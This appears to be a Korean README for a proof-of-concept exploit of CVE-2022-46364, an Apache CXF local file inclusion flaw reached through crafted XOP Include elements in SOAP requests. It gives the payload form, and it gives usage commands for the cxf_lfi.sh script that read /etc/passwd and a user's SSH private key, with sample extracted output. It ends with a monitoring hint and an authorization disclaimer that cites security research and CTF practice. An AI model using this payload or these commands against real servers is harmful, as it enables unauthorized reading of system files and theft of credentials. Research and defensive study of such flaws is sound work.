
CVE-2022-46364에 대한 개념 증명 익스플로잇으로, SOAP 요청의 조작된 XOP Include 요소를 통해 Apache CXF의 로컬 파일 포함 취약점을 악용하여 임의 파일 읽기를 허용합니다.
이 저장소는 Apache CXF의 Local File Inclusion (LFI) 취약점인 CVE-2022-46364에 대한 PoC(Proof-of-Concept) 익스플로잇을 포함합니다.
이 취약점은 SOAP 요청에서 XOP (XML-binary Optimized Packaging) Include 요소를 부적절하게 처리하여 발생하며, 공격자가 서버에서 임의의 파일을 읽을 수 있게 합니다.
Apache CXF는 SOAP 요청 내 <xop:Include> 요소를 부적절하게 처리합니다.
조작된 href (예: file:///etc/passwd)를 제공하면 서버가 로컬 파일 내용을 포함시켜 반환할 수 있습니다.
항상 대상 환경에서 정확한 취약 버전을 확인하세요.
<xop:Include href="file:///path/to/file"> 포함.
├── cxf_lfi.sh # Exploit script
├── README.md # Documentation
├── LICENSE # MIT License
└── .gitignore
chmod +x cxf_lfi.sh
스크립트 내 대상을 업데이트하세요:
TARGET="http://<TARGET_IP>:8080/employeeservice"
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///home/user/.ssh/id_rsa
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
일부 서버는 다음을 수행할 수 있습니다:
file:// 스키마를 살균하거나 차단출력 구문 분석은 응답 형식에 따라 달라지며 수동 검사가 필요할 수 있습니다.
다음을 포함하는 비정상적인 SOAP 요청 모니터링:
<xop:Include>file:// URI이 프로젝트는 다음을 위해 사용됩니다:
명시적 허가 없이 이 도구를 시스템에 사용하지 마십시오.
보안 연구 및 CTF 연습의 일환으로 개발되었습니다.